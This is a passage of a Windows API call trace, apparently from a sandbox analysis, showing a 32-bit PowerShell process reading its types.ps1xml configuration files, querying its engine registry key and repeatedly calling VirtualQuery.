lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0150.262] GetLastError () returned 0xcb [0150.262] SetErrorMode (uMode=0x1) returned 0x1 [0150.262] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x23e6cc | out: lpFileInformation=0x23e6cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0150.263] GetLastError () returned 0xcb [0150.263] SetErrorMode (uMode=0x1) returned 0x1 [0150.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.281] GetLastError () returned 0xcb [0150.283] GetACP () returned 0x4e4 [0150.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x23e0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0150.322] GetLastError () returned 0x0 [0150.322] SetErrorMode (uMode=0x1) returned 0x1 [0150.324] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x350 [0150.324] GetLastError () returned 0x0 [0150.325] GetFileType (hFile=0x350) returned 0x1 [0150.325] SetErrorMode (uMode=0x1) returned 0x1 [0150.325] GetFileType (hFile=0x350) returned 0x1 [0150.327] ReadFile (in: hFile=0x350, lpBuffer=0x2a11f98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a11f98*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.336] GetLastError () returned 0x0 [0150.337] ReadFile (in: hFile=0x350, lpBuffer=0x2a11f98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a11f98*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.337] GetLastError () returned 0x0 [0150.337] ReadFile (in: hFile=0x350, lpBuffer=0x2a11f98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a11f98*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.337] GetLastError () returned 0x0 [0150.338] ReadFile (in: hFile=0x350, lpBuffer=0x2a11f98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a11f98*, lpNumberOfBytesRead=0x23e644*=0xcf3, lpOverlapped=0x0) returned 1 [0150.338] GetLastError () returned 0x0 [0150.338] ReadFile (in: hFile=0x350, lpBuffer=0x2a1142b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a1142b*, lpNumberOfBytesRead=0x23e644*=0x0, lpOverlapped=0x0) returned 1 [0150.338] GetLastError () returned 0x0 [0150.338] ReadFile (in: hFile=0x350, lpBuffer=0x2a11f98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a11f98*, lpNumberOfBytesRead=0x23e644*=0x0, lpOverlapped=0x0) returned 1 [0150.338] GetLastError () returned 0x0 [0150.339] CloseHandle (hObject=0x350) returned 1 [0150.339] GetLastError () returned 0x0 [0150.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x23e1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0150.340] GetLastError () returned 0x0 [0150.340] SetErrorMode (uMode=0x1) returned 0x1 [0150.340] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2a2330c | out: lpFileInformation=0x2a2330c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0150.340] GetLastError () returned 0x0 [0150.340] SetErrorMode (uMode=0x1) returned 0x1 [0150.342] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x23e170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0150.342] GetLastError () returned 0x0 [0150.342] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e5c8 | out: phkResult=0x23e5c8*=0x350) returned 0x0 [0150.342] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e610, lpData=0x0, lpcbData=0x23e60c*=0x0 | out: lpType=0x23e610*=0x1, lpData=0x0, lpcbData=0x23e60c*=0x56) returned 0x0 [0150.342] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e610, lpData=0x357e88, lpcbData=0x23e60c*=0x56 | out: lpType=0x23e610*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x23e60c*=0x56) returned 0x0 [0150.343] RegCloseKey (hKey=0x350) returned 0x0 [0150.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x23e170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0150.343] GetLastError () returned 0x0 [0150.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x23e104, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0150.343] GetLastError () returned 0x0 [0150.453] GetSystemInfo (in: lpSystemInfo=0x23dd48 | out: lpSystemInfo=0x23dd48*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0150.456] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0150.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x23e0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0150.515] GetLastError () returned 0x0 [0150.515] SetErrorMode (uMode=0x1) returned 0x1 [0150.515] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x350 [0150.515] GetLastError () returned 0x0 [0150.515] GetFileType (hFile=0x350) returned 0x1 [0150.515] SetErrorMode (uMode=0x1) returned 0x1 [0150.515] GetFileType (hFile=0x350) returned 0x1 [0150.515] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.523] GetLastError () returned 0x0 [0150.523] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.524] GetLastError () returned 0x0 [0150.524] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.525] GetLastError () returned 0x0 [0150.525] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.525] GetLastError () returned 0x0 [0150.525] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.525] GetLastError () returned 0x0 [0150.526] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.526] GetLastError () returned 0x0 [0150.526] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.526] GetLastError () returned 0x0 [0150.526] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.526] GetLastError () returned 0x0 [0150.526] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.527] GetLastError () returned 0x0 [0150.527] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.527] GetLastError () returned 0x0 [0150.528] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.528] GetLastError () returned 0x0 [0150.528] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.528] GetLastError () returned 0x0 [0150.528] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.528] GetLastError () returned 0x0 [0150.528] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.528] GetLastError () returned 0x0 [0150.528] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.528] GetLastError () returned 0x0 [0150.529] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.529] GetLastError () returned 0x0 [0150.529] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.529] GetLastError () returned 0x0 [0150.531] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.531] GetLastError () returned 0x0 [0150.531] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.531] GetLastError () returned 0x0 [0150.531] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.531] GetLastError () returned 0x0 [0150.531] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.531] GetLastError () returned 0x0 [0150.531] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.531] GetLastError () returned 0x0 [0150.532] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.532] GetLastError () returned 0x0 [0150.532] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.532] GetLastError () returned 0x0 [0150.532] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.532] GetLastError () returned 0x0 [0150.532] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.532] GetLastError () returned 0x0 [0150.532] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.532] GetLastError () returned 0x0 [0150.533] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.533] GetLastError () returned 0x0 [0150.533] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.533] GetLastError () returned 0x0 [0150.533] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.533] GetLastError () returned 0x0 [0150.533] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.533] GetLastError () returned 0x0 [0150.533] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.533] GetLastError () returned 0x0 [0150.533] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.533] GetLastError () returned 0x0 [0150.555] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.555] GetLastError () returned 0x0 [0150.556] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.556] GetLastError () returned 0x0 [0150.556] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.556] GetLastError () returned 0x0 [0150.556] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.556] GetLastError () returned 0x0 [0150.556] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.556] GetLastError () returned 0x0 [0150.556] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.556] GetLastError () returned 0x0 [0150.556] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.557] GetLastError () returned 0x0 [0150.557] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1000, lpOverlapped=0x0) returned 1 [0150.557] GetLastError () returned 0x0 [0150.557] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x1b4, lpOverlapped=0x0) returned 1 [0150.557] GetLastError () returned 0x0 [0150.557] ReadFile (in: hFile=0x350, lpBuffer=0x2a57728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e644, lpOverlapped=0x0 | out: lpBuffer=0x2a57728*, lpNumberOfBytesRead=0x23e644*=0x0, lpOverlapped=0x0) returned 1 [0150.557] GetLastError () returned 0x0 [0150.557] CloseHandle (hObject=0x350) returned 1 [0150.557] GetLastError () returned 0x0 [0150.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x23e1a4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0150.557] GetLastError () returned 0x0 [0150.557] SetErrorMode (uMode=0x1) returned 0x1 [0150.557] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2a77fb8 | out: lpFileInformation=0x2a77fb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0150.557] GetLastError () returned 0x0 [0150.558] SetErrorMode (uMode=0x1) returned 0x1 [0150.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x23e170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0150.558] GetLastError () returned 0x0 [0150.558] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e5c8 | out: phkResult=0x23e5c8*=0x350) returned 0x0 [0150.558] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e610, lpData=0x0, lpcbData=0x23e60c*=0x0 | out: lpType=0x23e610*=0x1, lpData=0x0, lpcbData=0x23e60c*=0x56) returned 0x0 [0150.558] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x23e610, lpData=0x357e88, lpcbData=0x23e60c*=0x56 | out: lpType=0x23e610*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x23e60c*=0x56) returned 0x0 [0150.558] RegCloseKey (hKey=0x350) returned 0x0 [0150.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x23e170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0150.558] GetLastError () returned 0x0 [0150.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x23e104, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0150.558] GetLastError () returned 0x0 [0151.008] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.025] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.027] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.027] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.028] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.028] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.029] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.032] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.079] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, dwLength=0x1c | out: lpBuffer=0x23e504*(BaseAddress=0x23d000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.079] VirtualQuery (in: lpAddress=0x23d504, lpBuffer=0x23e504, 